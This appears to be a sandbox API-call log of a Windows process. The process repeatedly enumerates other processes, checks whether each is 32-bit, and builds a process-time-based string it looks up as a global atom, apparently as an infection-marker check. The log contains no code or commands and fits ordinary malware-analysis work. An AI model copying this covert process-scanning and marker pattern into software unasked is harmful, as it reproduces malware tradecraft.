	[0111.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0111.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0111.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0111.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0111.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0111.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0111.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0111.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0111.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0111.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0111.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0111.935] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.935] CloseHandle (hObject=0x694) returned 1
	[0111.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0111.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0111.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0111.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.936] CloseHandle (hObject=0x694) returned 1
	[0111.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0111.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0111.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.936] CloseHandle (hObject=0x694) returned 1
	[0111.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0111.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.937] CloseHandle (hObject=0x694) returned 1
	[0111.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0111.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.937] CloseHandle (hObject=0x694) returned 1
	[0111.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0111.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.937] CloseHandle (hObject=0x694) returned 1
	[0111.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0111.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.937] CloseHandle (hObject=0x694) returned 1
	[0111.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0111.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.938] CloseHandle (hObject=0x694) returned 1
	[0111.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0111.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0111.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.938] CloseHandle (hObject=0x694) returned 1
	[0111.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0111.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.938] CloseHandle (hObject=0x694) returned 1
	[0111.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0111.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.938] CloseHandle (hObject=0x694) returned 1
	[0111.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0111.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.939] CloseHandle (hObject=0x694) returned 1
	[0111.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0111.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.939] CloseHandle (hObject=0x694) returned 1
	[0111.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0111.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.939] CloseHandle (hObject=0x694) returned 1
	[0111.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0111.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.939] CloseHandle (hObject=0x694) returned 1
	[0111.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0111.939] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.939] CloseHandle (hObject=0x694) returned 1
	[0111.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0111.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.940] CloseHandle (hObject=0x694) returned 1
	[0111.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0111.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.940] CloseHandle (hObject=0x694) returned 1
	[0111.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0111.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.940] CloseHandle (hObject=0x694) returned 1
	[0111.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0111.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.940] CloseHandle (hObject=0x694) returned 1
	[0111.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0111.940] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.940] CloseHandle (hObject=0x694) returned 1
	[0111.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0111.941] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.941] CloseHandle (hObject=0x694) returned 1
	[0111.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0111.941] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.941] CloseHandle (hObject=0x694) returned 1
	[0111.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0111.941] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.941] CloseHandle (hObject=0x694) returned 1
	[0111.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0111.941] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.941] CloseHandle (hObject=0x694) returned 1
	[0111.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0111.942] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.942] CloseHandle (hObject=0x694) returned 1
	[0111.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0111.942] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.942] CloseHandle (hObject=0x694) returned 1
	[0111.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0111.942] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.942] CloseHandle (hObject=0x694) returned 1
	[0111.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0111.942] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.942] CloseHandle (hObject=0x694) returned 1
	[0111.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0111.942] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.942] CloseHandle (hObject=0x694) returned 1
	[0111.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.943] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.943] CloseHandle (hObject=0x694) returned 1
	[0111.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.943] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.943] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0111.943] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0111.944] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0111.944] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.944] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0111.944] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.944] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0111.944] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0111.944] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.945] CloseHandle (hObject=0x694) returned 1
	[0111.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.945] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.945] CloseHandle (hObject=0x694) returned 1
	[0111.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.945] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.945] CloseHandle (hObject=0x694) returned 1
	[0111.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.945] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.945] CloseHandle (hObject=0x694) returned 1
	[0112.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0112.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0112.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0112.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0112.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0112.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0112.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0112.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0112.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0112.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0112.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0112.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0112.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0112.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0112.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0112.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0112.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0112.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0112.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0112.027] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.027] CloseHandle (hObject=0x694) returned 1
	[0112.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0112.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0112.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0112.027] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.027] CloseHandle (hObject=0x694) returned 1
	[0112.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0112.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0112.028] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.028] CloseHandle (hObject=0x694) returned 1
	[0112.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0112.028] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.028] CloseHandle (hObject=0x694) returned 1
	[0112.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0112.028] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.028] CloseHandle (hObject=0x694) returned 1
	[0112.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0112.029] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.029] CloseHandle (hObject=0x694) returned 1
	[0112.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0112.029] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.029] CloseHandle (hObject=0x694) returned 1
	[0112.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0112.029] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.029] CloseHandle (hObject=0x694) returned 1
	[0112.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0112.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0112.029] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.029] CloseHandle (hObject=0x694) returned 1
	[0112.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0112.030] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.030] CloseHandle (hObject=0x694) returned 1
	[0112.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0112.030] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.030] CloseHandle (hObject=0x694) returned 1
	[0112.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0112.030] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.030] CloseHandle (hObject=0x694) returned 1
	[0112.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0112.030] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.030] CloseHandle (hObject=0x694) returned 1
	[0112.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0112.030] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.031] CloseHandle (hObject=0x694) returned 1
	[0112.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0112.031] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.031] CloseHandle (hObject=0x694) returned 1
	[0112.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0112.031] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.031] CloseHandle (hObject=0x694) returned 1
	[0112.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0112.031] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.031] CloseHandle (hObject=0x694) returned 1
	[0112.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0112.031] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.031] CloseHandle (hObject=0x694) returned 1
	[0112.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0112.032] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.032] CloseHandle (hObject=0x694) returned 1
	[0112.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0112.032] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.032] CloseHandle (hObject=0x694) returned 1
	[0112.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0112.032] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.032] CloseHandle (hObject=0x694) returned 1
	[0112.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0112.032] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.032] CloseHandle (hObject=0x694) returned 1
	[0112.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0112.033] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.033] CloseHandle (hObject=0x694) returned 1
	[0112.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0112.033] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.033] CloseHandle (hObject=0x694) returned 1
	[0112.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0112.033] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.033] CloseHandle (hObject=0x694) returned 1
	[0112.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0112.033] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.033] CloseHandle (hObject=0x694) returned 1
	[0112.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0112.033] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.034] CloseHandle (hObject=0x694) returned 1
	[0112.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0112.034] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.034] CloseHandle (hObject=0x694) returned 1
	[0112.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0112.034] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.034] CloseHandle (hObject=0x694) returned 1
	[0112.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0112.034] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.034] CloseHandle (hObject=0x694) returned 1
	[0112.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0112.034] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.034] CloseHandle (hObject=0x694) returned 1
	[0112.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0112.035] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.035] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0112.035] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0112.035] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0112.036] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.036] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0112.036] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.036] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0112.036] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0112.036] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0112.087] CloseHandle (hObject=0x694) returned 1
	[0112.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0112.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0112.088] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.088] CloseHandle (hObject=0x694) returned 1
	[0112.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0112.088] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.088] CloseHandle (hObject=0x694) returned 1
	[0112.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0112.088] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.088] CloseHandle (hObject=0x694) returned 1
	[0112.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0112.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0112.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0112.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0112.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0112.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0112.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0112.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0112.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0112.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0112.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0112.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0112.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0112.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0112.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0112.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0112.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0112.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0112.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x424
	[0112.253] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.253] CloseHandle (hObject=0x424) returned 1
	[0112.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0112.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0112.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x424
	[0112.253] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.254] CloseHandle (hObject=0x424) returned 1
	[0112.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0112.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x424
